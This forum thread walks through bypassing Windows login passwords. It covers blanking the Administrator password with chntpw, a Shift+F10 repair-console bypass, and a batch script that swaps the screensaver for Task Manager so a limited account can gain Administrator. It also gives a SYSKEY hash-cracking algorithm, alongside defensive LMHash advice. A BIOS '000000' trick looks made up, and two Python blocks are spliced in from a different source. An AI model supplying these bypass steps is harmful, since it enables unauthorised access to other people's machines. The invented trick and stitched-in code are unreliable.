Password Reset....how to...???...HOT UPDATED
MAS 
Juru Kunci


Helped: 91 times
Age: 44
Joined: 16 Jan 2005
Posts: 15557
Location: Jakarta-Purwokerto PP
Posted: Thu May 05, 2005 5:30 pm   Password Reset....how to...???...HOT UPDATED

First, what you need is:

1. http://home.eunet.no/%7Epnordahl/ntpasswd/bd050303.zip > to make the boot disk image

2. http://home.eunet.no/%7Epnordahl/ntpasswd/sc050303.zip > the boot disk image used for SCSI HDDs

3. http://home.eunet.no/%7Epnordahl/ntpasswd/cd050303.zip > to make the CD image.

A few things to pay attention to here beforehand:
1. Files or folders that are encrypted (EFS) will not be openable with the new password!!!
2. A mistake when deleting the SAM file will cause loss of boot access to the OS; for that you can back up NTLDR and NTDETECT first and copy them back if that problem comes up...

Before starting, it's a good idea to read up first at

http://home.eunet.no/%7Epnordahl/ntpasswd/faq.html

http://home.eunet.no/%7Epnordahl/ntpasswd/

OK, let's assume everything is downloaded and extracted onto the floppy/CD and we start loading it on the "target"; the screen will show... something like this,

OVERVIEW:
1. Disk select: states the disk where the Windows system is installed. Optionally, a special driver is sometimes needed to access that disk; this happens with SATA disks and some SCSI disk models, so don't forget to bring the driver floppy for that disk controller.
2. PATH: where the system files are installed on the disk.
3. Password reset and registry editor
4. Write back to disk (you will be asked to confirm this at the end of the application)

DON'T PANIC! Even without choosing anything you will be taken to the "default" of this application, marked [...], so just press "enter/return" to start the action...

1. DISK SELECT: where is the OS file system located...?

=========================================================
. Step ONE: Select disk where the Windows installation is
=========================================================
Disks:
Disk /dev/ide/host0/bus0/target0/lun0/disc: 2147 MB, 2147483648 bytes
NT partitions found:
1 : /dev/ide/host0/bus0/target0/lun0/part1 2043MB Boot

Please select partition by number or
a = show all partitions, d = automatically load new disk drivers

m = manually load new disk drivers
l = relist NTFS/FAT partitions, q = quit
Select: [1]

- Some machines only have 1 disk for the OS, so you can choose 1 as the default.
- Or if several disks are installed, you can choose from the "partition select" table.
- If no system disk gets loaded, on SCSI drives or in RAID mode, choose d in the driver select menu for auto-probe detection.
- If auto-probe doesn't work, you have to choose m to do it manually.

2. MANUAL LOAD DRIVER DISK:

Select: [1] m
==== DISK DRIVER / SCSI DRIVER select ====
You may now insert or swap to the SCSI-drivers floppy
Press enter when done:
Found 1 floppy drives
Found only one floppy, using it..
Selected floppy #0
Mounting it..
Floppy selection done..
SCSI-drivers found on floppy:

1 BusLogic.o.gz
2 aic7xxx.o.gz
3 sym53c8xx.o.gz
[ ... ]

SCSI driver selection:
a - autoprobe for the driver (try all)
s - swap driver floppy
q - do not load more drivers
or enter the number of the desired driver

SCSI driver select: [q]

- Select a and it will try to load all the drivers, stopping once a driver finishes loading.
- If you already know the location of that drive, you can directly choose the number of the detected driver.

SCSI driver select: [q] a
[ BusLogic.o.gz ]
Using /tmp/scsi/BusLogic.o
PCI: Found IRQ 11 for device 00:10.0

[.... lots of driver / card info ...]

scsi0: *** BusLogic BT-958 Initialized Successfully ***
scsi0 : BusLogic BT-958
Vendor: FooInc Model: MegaDiskFoo Rev: 1.0
Type: Direct-Access ANSI SCSI revision: 02

[ ... ]

Attached scsi disk sda at scsi0, channel 0, id 0, lun 0
SCSI device sda: 8388608 512-byte hdwr sectors (4295 MB)
Partition check:
/dev/scsi/host0/bus0/target0/lun0: p1
Driver BusLogic.o.gz loaded and initialized.

- And you can stop the loading process with the command q while trying to load several drivers.
- When it stops you'll see the choices above again.

*** OK, at this point you're assumed to have found the "disk drive containing the installed Windows OS"; the next step is... ***

3. PATH and FILE SELECT: where the Windows OS system is installed (the target file!)

# winnt35/system32/config - Windows NT 3.51
# winnt/system32/config - Windows NT 4 and Windows 2000
# windows/system32/config - Windows XP/2003 and often Windows 2000 upgraded from Windows 98 or earlier.

OK, once that's done, the default choice will automatically find that file path; here just press enter, and next it will go like this....

Selected 1
Mounting on /dev/ide/host0/bus0/target0/lun0/part1
NTFS volume version 3.1.
Filesystem is: NTFS

=========================================================
. Step TWO: Select PATH and registry files
=========================================================
What is the path to the registry directory? (relative to windows disk)
[windows/system32/config] :

-r-------- 1 0 0 262144 Jan 12 18:01 SAM
-r-------- 1 0 0 262144 Jan 12 18:01 SECURITY
-r-------- 1 0 0 262144 Jan 12 18:01 default
-r-------- 1 0 0 8912896 Jan 12 18:01 software
-r-------- 1 0 0 2359296 Jan 12 18:01 system
dr-x------ 1 0 0 4096 Sep 8 11:37 systemprofile
-r-------- 1 0 0 262144 Sep 8 11:53 userdiff

Select which part of registry to load, use predefined choices
or list the files with space as delimiter
1 - Password reset [sam system security]
2 - RecoveryConsole parameters [software]
q - quit - return to previous
[1] :

- If the choice is right, then "as above" will appear, but it sometimes varies with the different disk layouts out there.
- Then you can choose which option you want to perform (type the number of the choice).
- The password reset choice is the default, and that's what we're after, isn't it...?
- Choice 2 can actually be used for the recovery console on WinXP, W2K, W2K3 by getting past the "administrator password".
- Or if you want to edit the registry, choose the hives you want to load.

OK, we choose 1, namely "password edit"....

4. PASSWORD RESET: ready for something new....???

=========================================================
. Step THREE: Password or registry edit
=========================================================
chntpw version 0.99.2 040105, (c) Petter N Hagen

[.. some file info here ..]

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: <sam> <system> <security>

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)


What to do? [1] -> 1

===== chntpw Edit User Info & Passwords ====

RID: 01f4, Username: <Administrator>
RID: 01f5, Username: <Guest>, *disabled or locked*
RID: 03e8, Username: <HelpAssistant>, *disabled or locked*
RID: 03eb, Username: <pnh>, *disabled or locked*
RID: 03ea, Username: <SUPPORT_388945a0>, *disabled or locked*

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator]

- Here you face the reset choice for the usernames on the Windows OS; the user names will vary depending on how many users/groups you have in one OS.
- The username choice is very sensitive! But you can pick the RID instead to be safe; if we choose RID "01f4" the choice falls on "ADMINISTRATOR"....!!!
- But don't worry, because the default choice here is "administrator", which has plenty of access on the "road to Rome"... right...?

RID : 0500 [01f4]
Username: Administrator
fullname:
comment : Built-in account for administering the computer/domain

homedir :

Account bits: 0x0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 3

* = blank the password (This may work better than setting a new password!)
Enter nothing to leave it unchanged
Please enter new password: *

- Some information will be displayed; also, if the administrator account is locked you'll be asked to "unlock" it before the real action happens. In some cases the account is locked to prevent "things that should never happen"...!!!

- We will choose blank password (*) for this setting, and this is HIGHLY RECOMMENDED

Please enter new password: *
Blanking password!

Do you really wish to change it? (y/n) [n] y
Changed!

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator] !

- That choice takes us to the next menu...

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> q

5. WRITING OUT THE CHANGE: ...let me log in as I please...!!!

Hives that have changed:
# Name
0 - OK

=========================================================
. Step FOUR: Writing back changes
=========================================================
About to write file(s) back! Do it? [n] : y

- The last choice; on choosing "y" the new password gets written.

Writing sam

NOTE: A disk fixup will now be done.. it may take some time

Mounting volume... OK

Processing of $MFT and $MFTMirr completed successfully.

NTFS volume version is 3.1.

Setting required flags on partition... OK

Going to empty the journal ($LogFile)... OK

NTFS partition /dev/ide/host0/bus0/target0/lun0/part1 was processed successfully.
NOTE: Windows will run a diskcheck (chkdsk) on next boot.
NOTE: this is to ensure disk intergity after the changes

***** EDIT COMPLETE *****

You can try again if it somehow failed, or you selected wrong
New run? [n] : n

- And that's it; now just use the "three mighty fingers" move (ctrl+alt+del) to finish, and REMOVE the floppy or disk that was in there before... once login starts, choose administrator and don't fill in anything as the password, just press "enter" and... boing... boooing.... you're into your beloved Windows...! And don't forget your password again, or go ahead and be naughty....



OK... this tip just came in from a friend who "supposedly" couldn't reset his password with the method above...

1. Set the BIOS to boot from CD and insert the WinXP CD
2. Choose the "repair" option
3. Leave it as it is until setup gets to "copying files"...
4. After it finishes there will be a reboot prompt for 15 seconds... just leave it.
5. When the "installing devices" logo appears, use that chance as well as you can: press "SHIFT + F10", and THIS IS A SECURITY HOLE!!! After pressing it a command prompt appears; immediately type "NUSRMGR.CPL" and press "enter"... and right then you bypass the whole process and "GO STRAIGHT INTO THE CONTROL PANEL". After that it's easy to change or delete all the accounts in there....
6. After you leave the repair process you'll be free to log in as anything, with or without passwords!!!

Go ahead and try.....

Last edited by MAS on Sun Aug 28, 2005 6:12 pm; edited 1 time in total  
 
 
MAS 
Posted: Tue May 10, 2005 9:46 pm   HERE'S ANOTHER ONE ... !!!

1. Enter the BIOS while booting
2. In the BIOS, set the clock time to "00:00:00"
3. Then press CTRL + F9 and enter....
4. Then... a window will appear asking for passwords....
5. Just fill in "000000" (the digit 0 six times!)
6. Press enter
7. Type "exit"
8. Boot by pressing "F8" and go in via "safe mode with networking"
9. Then...! boing... boing, you're back in.... Windows, bypassing the administrator password however strong it is....

 
 
zoolook 
baru ng-Oprek



Joined: 05 May 2005
Posts: 66
Location: down under
Posted: Thu May 12, 2005 2:41 am   

There's still more, right...? And then how do you protect against these things? Please also cover that (LMHash and NTHash) so it's balanced....

Sorry if I'm asking for too much...

 
 
MAS 
Posted: Sun Jun 05, 2005 2:36 pm   

Hang on.... here's another one, this one's called "override user agent", it goes like this....

Login as a limited account, guest etc.. then open notepad.exe found in start/all program files/accessories and type the following:

cd\
cd\windows\system32
mkdir temphack
copy taskmgr.exe temphack\taskmgr.exe
copy logon.scr temphack\logon.scr
del logon.scr
rename taskmgr.exe logon.scr
exit

and then save it as a .bat file, for example x.bat not .txt. Then double click on the file you just saved and it should execute some commands that should replace your screensaver with the task manager. Now log off your limited account and wait for 10 to 15 mins, without touching the mouse or keyboard, and wait for the screensaver to come on, which shall be the task manager. When it appears click on New Task and in the box type in regedit. This should open up the registry editor. Now go to the hive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and double click on AutoAdminLogon and set the value to 1 and click ok. Now refresh the registry and close it, and then restart the pc. Once the pc is restarted you should automatically logon as Administrator.
Now you must put your screensaver back to normal by opening notepad.exe and by typing the following:

cd\Windows\system32
del logon.scr
cd\Windows\system32\temphack
copy logon.scr C:\Windows\system32
copy taskmgr.exe C:\Windows\system32
exit

Now save it as restore.bat and execute it.

That one gets in from the logon, i.e. by capturing the admin password stored at the screen...

 
 
MAS 
Posted: Sun Jun 05, 2005 2:46 pm   Anti Password Cracked...!!!

If your PC is susceptible to intrusion either through janitorial services, maintenance, or some other entity that has access to your PC physically, and you'd like to prevent a criminal with some knowledge from easily nabbing your password and using a program to unencrypt the stored copies, you might want to edit this registry entry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\nolmhash

Set that entry to 1 to make sure that it doesn't leave a copy of your lmhash on your PC.

So you're saying to yourself, what the hell is an LMhash or an NThash:

The LMHash

The LMHash, also known as the Lan Manager hash, is technically speaking not a hash at all. It is computed as follows:

1. Convert all lower case characters in the password to upper case
2. Pad the password with NULL characters until it is exactly 14 characters long
3. Split the password into two 7 character chunks
4. Use each chunk separately as a DES key to encrypt a specific string
5. Concatenate the two cipher texts into a 128-bit string and store the result

As a result of the algorithm used to generate the LMHash, the hash is very easy to crack. First, even a password longer than 8 characters can be attacked in two discrete chunks. Second, the entire lower-case character set can be ignored. This means that most password cracking tools will start by cracking the LMHashes and then simply vary the alpha characters in the cracked password to generate the case-sensitive passwords. Note that in order to log on to a Windows 2000 system, whether remotely or locally, you will need to use the case-preserved password.

The NTHash

The NTHash is also known as the Unicode hash, because it supports the full Unicode character set. The NTHash is calculated by simply taking the plaintext password and generating an MD4 hash of it. The MD4 hash is then stored. The NTHash is much more resistant to brute force attacks than the LMHash. Brute forcing an NTHash takes several orders of magnitude longer than brute forcing the LMHash of the same password.
What constitutes a good password?

There are some general guidelines for what constitutes a reasonable password:

* Longer than 7 characters (otherwise the second half of the LMHash is an encryption using the NULL password)
* Contains elements from at least three of the following four character sets:
  o Uppercase characters
  o Lowercase characters
  o Numbers
  o Non-alphanumeric characters
* Does not contain any part of the user's name, username, or any common word

This complexity is enforced via a password filter, and can be optionally required using group policy. Additionally, an administrator can customize the complexity requirements by writing a custom password filter. Such a filter could, for example, enforce that company names are not part of the password, or require additional complexity. For more information on how to write such a filter, refer to section on Password Filters in the Microsoft Windows Software Development Kit, at http://msdn.microsoft.com...rd_filters.asp.

However, most passwords like these are still easily cracked. There are several steps that can be taken to make a password harder to crack:

* Use non-alpha numeric characters other than those from the "upper row." Upper row characters are those you type by holding down SHIFT and typing any number key. Most password crackers know that the upper row characters are the most common method to add entropy to a password and therefore start cracking with those.
* Use ALT characters. ALT characters are those that you type by holding down the ALT key (the FN+ALT keys on a laptop) and typing a three or four digit number on the numeric keypad (the numeric overlay keypad on a laptop). Most password crackers are not capable of testing the vast majority of ALT characters.
* Do not allow storage of the LMHash.

There are many ways to prevent storage of the LMHash. A system wide method will be discussed later. However, the creation of an LMHash can be controlled on a per-account basis by constructing the password in certain ways.

First, if the password is longer than 14 characters, the system is unable to generate an LMHash. In Windows 2000, passwords can be up to 127 characters.

Second, if the password contains certain ALT characters, the system will also not be able to generate an LMHash. This latter point is tricky, because while some ALT characters significantly strengthen the password by removing the LMHash, others significantly weaken it since they are converted into a normal upper-case letter prior to storage. There are many characters, however, which will strengthen the password. Table 1 lists all the characters below 1024 which cause the LMHash not to be generated.

Table 1 ALT characters which cause the LMHash to disappear
0128-0159 0306-0307 0312 0319-0320
0329-0331 0383 0385-0406 0408-0409
0411-0414 0418-0424 0426 0428-0429
0433-0437 0439-0447 0449-0450 0452-0460
0477 0480-0483 0494-0495 0497-0608
0610-0631 0633-0696 0699 0701-0707
0709 0711 0716 0718-0729
0731 0733-0767 0773-0775 0777
0779-0781 0783-0806 0808-0816 0819-0893
0895-0912 0914 0918-0919 0921-0927
0929-0930 0933 0935-0936 0938-0944
0947 0950-0955 0957-0959 0961-0962
0965 0967-1024

In many environments the LMHash cannot be disabled system wide. This could be the case, for example, in environments where the operating system is installed over the network by booting to a DOS disk. DOS does not support the NT hash algorithm and therefore requires the LMHash to be present. DOS also does not support ALT characters in the password. While we recommend that LMHashes be disabled system wide in all environments where it is feasible, the above techniques can be used to strengthen individual passwords in all environments.

We particularly recommend using ALT characters on sensitive accounts such as service accounts and administrative accounts. In general, these accounts need greater protection than ordinary user accounts, and the users using them should be willing to use very complicated passwords. One caveat is that using ALT characters in a password does break the recovery console, however. This should be kept in mind before setting up passwords with ALT characters.

Now that should clear it up like a visit to the pharmacist clears up mono.
:D

I've changed my LMhash just to be safe. And I will be encrypting some files and drives that I don't want anyone to see. So even if they do crack into your machine, without your NT password [NThash] (much harder to crack than the LMhash), they cannot see your files.
:D



Vulnerability in Windows NT's SYSKEY encryption
SYSKEY does not fully protect the SAM from off-line attacks. Specifically, dictionary and brute-force password cracking are still possible, even when SYSKEY is enabled and the attacker is not in possession of the SystemKey.
Affected systems: All Windows NT 4.0 machines and pre-RC3 W2K machines with SYSKEY enabled.
SYSKEY is an optional Windows NT feature that was added in NT4.0 SP3. It adds further encryption to the password hashes in the SAM database. This encryption is meant to protect the SAM from 'off-line' attacks, where an attacker has gotten a copy of the SAM (e.g., by stealing a backup tape, repair disk, or the entire machine), but does not have the System Key. Without SYSKEY enabled, such an attacker would be able to directly recover all of the password hashes, and could then use them to authenticate on the network, or brute force them to obtain the plaintext passwords. Tools are currently available to do this. SYSKEY is supposed to defend against these attacks, but we have discovered that, due to implementation flaws, it falls well short.
How does SYSKEY change what is stored in the SAM? Let's look at an example. Here's a (partial) hex dump of the registry value
HKLM/SAM/SAM/Domains/Account/Users/000001F4/V: (before SYSKEY enabled)

000001f0: 6400 6f00 6d00 6100 6900 6e00 0102 0000 d.o.m.a.i.n.....
00000200: 0700 0000 0002 0000 0700 0000 ce28 297d .............()}
00000210: ede4 0fab 3a0f 6436 aff3 881f 0edb a361 ....:.d6.......a
00000220: 4fb6 c22a e367 e3ea bad8 807c 0edb a361 O..*.g.....|...a
00000230: 4fb6 c22a e367 e3ea bad8 807c 653c e4ff O..*.g.....|e<..
00000240: 45a2 1ee6 b2db 5d9f 09fe f2fd 8fb8 9576 E.....]........v
00000250: 81a5 70e6 c83d 0be2 a7f1 4fcb ce28 297d ..p..=....O..()}
00000260: ede4 0fab 3a0f 6436 aff3 881f 339e 652f ....:.d6....3.e/
00000270: be4f 2b9d 3a0f 6436 aff3 881f f42c 7909 .O+.:.d6.....,y.
00000280: 5604 6ea4 3a0f 6436 aff3 881f V.n.:.d6....

This is part of the SAM entry for the Administrator account on a test machine. The password hashes start at offset 0x20c. The first 16 bytes are the LMHash, the next 16 bytes are the NTHash, and the bytes after that are the hashes of the password history (including the current password), for both the NTHash and LMHash values. Actually, these are the obfuscated password hashes, although that's unimportant at this point. The data is roughly the real password hashes DES encrypted with the user's RID as the key. Code to undo the obfuscation can be found in pwdump.
So, we know:

obfusc. LMHash: ce28297dede40fab3a0f6436aff3881f
obfusc. NTHash: 0edba3614fb6c22ae367e3eabad8807c

After enabling SYSKEY, this changes to
HKLM/SAM/SAM/Domains/Account/Users/000001F4/V: (after SYSKEY enabled)

000001f0: 6400 6f00 6d00 6100 6900 6e00 0102 0000 d.o.m.a.i.n.....
00000200: 0700 0000 0002 0000 0700 0000 0100 0000 ................
00000210: 3e0e 0261 d2f5 f009 757c 7e7e 626a 78c1 >..a....u|~~bjx.
00000220: 0100 0000 fefd 887d 70a7 3d88 ac14 f9a2 .......}p.=.....
00000230: 7741 70a2 0100 0000 fefd 887d 70a7 3d88 wAp........}p.=.
00000240: ac14 f9a2 7741 70a2 96c6 794f 5959 0939 ....wAp...yOYY.9
00000250: c5a1 08d7 71e5 f60f 25e5 bc12 2a9f 1c4a ....q...%...*..J
00000260: 1b8c c152 6d04 6962 0100 0000 3e0e 0261 ...Rm.ib....>..a
00000270: d2f5 f009 757c 7e7e 626a 78c1 c064 f89f ....u|~~bjx..d..
00000280: a2b4 3c42 4d75 317e d7e8 8ced 5e71 506d ..<BMu1~....^qPm
00000290: fd3e 0208 e9be ae86 6506 aeb6 .>......e...



Now, aside from the insertion of '0100 0000' in front of each entry, we have the encrypted versions of the above.

enc. obfusc. LMHash: 3e0e0261d2f5f009757c7e7e626a78c1
enc. obfusc. NTHash: fefd887d70a73d88ac14f9a2774170a2

Encryption Analysis:
So, assuming all we have is the encrypted, obfuscated password hashes, what can we do? The more binary inclined may already see the punch line coming. It turns out that the hashes are encrypted with the same rc4 keystream, and consequently, that simply xoring them together will remove the encryption, and leave you with the xor of the obfuscated LM and NT hashes:

enc. obfusc. LMHash: 3e0e0261d2f5f009757c7e7e626a78c1
enc. obfusc. NTHash: xor fefd887d70a73d88ac14f9a2774170a2
--------------------------------
c0f38a1ca252cd81d96887dc152b0863

and

obfusc. LMHash: ce28297dede40fab3a0f6436aff3881f
obfusc. NTHash: xor 0edba3614fb6c22ae367e3eabad8807c
--------------------------------
c0f38a1ca252cd81d96887dc152b0863

Some work with a disassembler reveals the complete details of the encryption. For each user, the system uses a different key, which is computed by taking the MD5 sum of the global 128-bit encryption key (aka the password encryption key) concatenated with the user's 4-byte RID. However, this key is then used to rc4-encrypt the user's obfusc. LMHash, NTHash, and two password histories, all independently, using the same keystream.
Due to this flawed implementation, it is possible to conduct dictionary and brute force attacks against a SYSKEY protected SAM. An initial attack would be as follows:

For each candidate password {
Compute LMHash(password) and NTHash(passwd)
Obfuscate the hashes as they are stored in the registry
Xor the two results
Compare with the xor of the SYSKEY encrypted versions of same
if they match, we've found the password.
}
Note that since the above calculation involves the user's RID, the attack must be done for one user at a time. However, this attack
can be improved upon by taking a closer look at the details.
Starting from the beginning, we know this:
NTHash is MD4 of the user's unicode password. LMHash is the DES encryption of "KGS!@#$%", using the password as the key. Since DES keys are only 56 bits, the password is broken into two 7 byte halves, then each half is used as a key. This leaves us with two 128 bit hashes, NTHash, and LMHash.
When stored in the registry, the hashes are further obfuscated by DES encrypting them, using a function of the user's RID as a key. Again, since the hashes are 128 bits, there are two DES encryptions done. The two halves are actually encrypted using different DES keys, but they're both functions of the RID. For details on this encryption, see Jeremy Allison's pwdump.

So, what ends up in the registry is:
des(k1,1st half lmhash), des(k2, 2nd half lmhash)

and
des(k1,1st half nthash), des(k2, 2nd half nthash)


where k1 and k2 are known functions of the user's RID.

Now, with syskey, there's a layer of rc4 encryption on top of that. Fortunately (for attackers), it reuses the keystream. So, stored in the registry is:
rc4 (k3, (des(k1,1st half lmhash), des(k2, 2nd half lmhash)))

and
rc4 (k3, (des(k1,1st half nthash), des(k2, 2nd half nthash)))


where k3 is unknown, and different for every user. Precisely, it's MD5(password encryption key concatenated with the user's RID).


Now, to attack, we xor out the rc4 encryption, giving:
des(k1,1st half lmhash), des(k2, 2nd half lmhash)

xored with
des(k1,1st half nthash), des(k2, 2nd half nthash)


or rewriting,
des(k1,1st half lmhash) ^ des(k1,1st half nthash)

and
des(k2,2nd half lmhash) ^ des(k2,2nd half nthash)


Again, we know k1 and k2.

Now, if we assume for the moment that the passwords are <= 7 characters, then we can proceed as follows:
since the LMHash is computed in halves, the second half will be fixed and known to us. Therefore, we can go through every user in the SAM and compute
des(k2,2nd half lmhash), take that, xor it with
des(k2,2nd half lmhash) ^ des(k2,2nd half nthash) to get
des(k2,2nd half nthash), then take that, and decrypt it with k2
to get 2nd half nthash. We can then look that up in our dictionary.
If we find a match, we can then verify that we have the correct password as in the first attack above. Since we've removed the user's RID through the above operations, we can conduct our attack against all users at once, for passwords which are <= 7 characters. Furthermore, we can precompute the dictionary; it will be good against all users on all machines.
What about passwords that are longer than 7 characters? Taking 8 character passwords as an example, we can still precompute a dictionary of NTHashes of 8 char passwords, and keep it sorted by the eighth character. Or perhaps think of it as 256 (or less if you're narrowing the search space) separate dictionaries. One for each 8th char. Now you can go through all users and try each of the 256 dictionaries, again computing the known 2nd half of lmhash and going from there. So we've reduced the strength of 8 char passwords to the strength of 1 char passwords modulo lots of space, and perhaps a large constant. This can be extended to longer passwords as well.
Note that it's also possible to attack the password histories, using the same technique.
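The LMHash rules quoted earlier in this post (the two 7-character halves, the baseline complexity policy, and the two per-account ways of suppressing LMHash storage: more than 14 characters, or a character from Table 1) can be turned into an audit check for a password policy. The Python below is an added example written for this thread, not code from the post, from chntpw or from Microsoft; it assumes the ALT-code numbers in Table 1 map directly to Unicode code points, and every sample password in it is constructed.

```python
"""Defender-side password audit derived from the LMHash discussion above.

Added example, not code from the forum post or from Microsoft. It treats
the ALT-code numbers in Table 1 as Unicode code points (an assumption)
and applies the two per-account rules the post gives for suppressing
LMHash storage: length over 14, or any character from Table 1.
"""
import string

# Table 1 from the post: ALT characters that cause no LMHash to be generated.
# Each entry is an inclusive (low, high) range of code points.
NO_LMHASH_RANGES = [
    (128, 159), (306, 307), (312, 312), (319, 320),
    (329, 331), (383, 383), (385, 406), (408, 409),
    (411, 414), (418, 424), (426, 426), (428, 429),
    (433, 437), (439, 447), (449, 450), (452, 460),
    (477, 477), (480, 483), (494, 495), (497, 608),
    (610, 631), (633, 696), (699, 699), (701, 707),
    (709, 709), (711, 711), (716, 716), (718, 729),
    (731, 731), (733, 767), (773, 775), (777, 777),
    (779, 781), (783, 806), (808, 816), (819, 893),
    (895, 912), (914, 914), (918, 919), (921, 927),
    (929, 930), (933, 933), (935, 936), (938, 944),
    (947, 947), (950, 955), (957, 959), (961, 962),
    (965, 965), (967, 1024),
]

LM_MAX_LENGTH = 14   # the LMHash is built from two 7-character halves


def blocks_lmhash(ch):
    """True if this single character appears in Table 1."""
    cp = ord(ch)
    return any(lo <= cp <= hi for lo, hi in NO_LMHASH_RANGES)


def lmhash_would_be_stored(password):
    """True when, per the post, Windows would still store an LMHash:
    14 characters or fewer and no Table 1 character."""
    if len(password) > LM_MAX_LENGTH:
        return False
    return not any(blocks_lmhash(c) for c in password)


def lmhash_exposure(password):
    """How much an LMHash would reveal: 'none' (no hash stored),
    'first-half-only' (second half is the well-known hash of the
    NULL-padded empty chunk) or 'both-halves'."""
    if not lmhash_would_be_stored(password):
        return "none"
    return "first-half-only" if len(password) <= 7 else "both-halves"


def meets_complexity(password):
    """The post's baseline policy: longer than 7 characters and drawing on
    at least three of the four character classes."""
    classes = [
        any(c in string.ascii_uppercase for c in password),
        any(c in string.ascii_lowercase for c in password),
        any(c in string.digits for c in password),
        any(c not in string.ascii_letters + string.digits for c in password),
    ]
    return len(password) > 7 and sum(classes) >= 3


def audit(password):
    """Combined verdict for reporting; returns a dict of findings."""
    return {
        "complexity_ok": meets_complexity(password),
        "lmhash_stored": lmhash_would_be_stored(password),
        "lmhash_exposure": lmhash_exposure(password),
    }


if __name__ == "__main__":
    # Constructed sample passwords, not taken from any real system.
    for pw in ["secret", "Passw0rd!", "Correct-Horse-Battery", "Pa\u0080ss1"]:
        print(repr(pw), audit(pw))
```

The interesting case is a short password that passes complexity: it still leaves an LMHash whose second half is the fixed NULL-chunk value, which is exactly the weakness the post's "longer than 7 characters" rule is aimed at. The Table 1 check is only a per-account mitigation; the system-wide setting the post names (the `nolmhash` value under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa`) is what removes the exposure for every account.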

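The central observation of the SYSKEY advisory quoted above is that every field of a user's SAM entry is RC4-encrypted with the same keystream, so xoring two ciphertexts cancels the keystream and leaves the xor of the two plaintexts. The Python below is an added example, not code from the advisory, from the post or from Microsoft: it re-checks that property against the four hex values the advisory quotes, reproduces it with a small RC4 written for this example, and contrasts it with a per-field key derivation. That hardened variant is this example's own suggestion for illustrating the fix, not a description of any real Windows change; the password encryption key and RID used in it are constructed placeholders.

```python
"""RC4 keystream reuse, as described in the SYSKEY advisory above.

Added example, not code from the advisory, the forum post or Microsoft.
The four hex constants are the values quoted in the advisory; the
password encryption key (PEK) is a constructed placeholder.
"""
import hashlib


def xor_bytes(a, b):
    """Byte-wise xor of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_keystream(key, length):
    """Plain RC4: key scheduling (KSA) followed by output generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key, data):
    """RC4 encryption and decryption are the same operation: xor with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


# Values quoted in the advisory (Administrator entry on the advisory author's test machine).
OBF_LM = bytes.fromhex("ce28297dede40fab3a0f6436aff3881f")   # obfuscated LMHash
OBF_NT = bytes.fromhex("0edba3614fb6c22ae367e3eabad8807c")   # obfuscated NTHash
ENC_LM = bytes.fromhex("3e0e0261d2f5f009757c7e7e626a78c1")   # same, after SYSKEY
ENC_NT = bytes.fromhex("fefd887d70a73d88ac14f9a2774170a2")   # same, after SYSKEY


def keystream_reuse_leaks(enc_a, enc_b, plain_a, plain_b):
    """The property the advisory relies on: under one shared keystream,
    xor(ciphertexts) == xor(plaintexts), so the encryption adds nothing."""
    return xor_bytes(enc_a, enc_b) == xor_bytes(plain_a, plain_b)


def syskey_style_encrypt(user_key, fields):
    """Flawed scheme from the advisory: one key per user, and the same
    keystream reused for every field (LM, NT, password histories)."""
    return [rc4(user_key, f) for f in fields]


def per_field_encrypt(user_key, fields):
    """Hardened variant (this example's own suggestion, not a real fix):
    derive a distinct key per field so no keystream is ever reused."""
    return [rc4(hashlib.md5(user_key + bytes([idx])).digest(), f)
            for idx, f in enumerate(fields)]


def demo():
    """Run the three checks and return their outcomes."""
    pek = bytes(16)                          # constructed placeholder PEK, not a real key
    rid = (0x01F4).to_bytes(4, "little")     # Administrator's RID, as in the advisory's dump
    user_key = hashlib.md5(pek + rid).digest()   # per-user key, as the advisory describes it
    flawed = syskey_style_encrypt(user_key, [OBF_LM, OBF_NT])
    fixed = per_field_encrypt(user_key, [OBF_LM, OBF_NT])
    return {
        "advisory_values_consistent": keystream_reuse_leaks(ENC_LM, ENC_NT, OBF_LM, OBF_NT),
        "flawed_scheme_leaks": keystream_reuse_leaks(flawed[0], flawed[1], OBF_LM, OBF_NT),
        "per_field_keys_leak": keystream_reuse_leaks(fixed[0], fixed[1], OBF_LM, OBF_NT),
    }


if __name__ == "__main__":
    print("xor of encrypted hashes:", xor_bytes(ENC_LM, ENC_NT).hex())
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The first check reproduces the advisory's own arithmetic: the xor of the two SYSKEY-encrypted values equals the xor of the two obfuscated hashes, c0f38a1c…0863. The third check is the design lesson: a stream cipher is only as good as the uniqueness of its keystream, and deriving one key per field, or using a per-field nonce, is what makes the xor trick meaningless.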
 
 
zoolook 
Posted: Mon Jun 06, 2005 5:18 am   

Wow...!!! So complete, honey and poison rolled into one....
 
 
freaxy
belajar ng-Oprek



Joined: 05 Apr 2005
Posts: 190
Location: C:\Documents and Settings\Freaxy
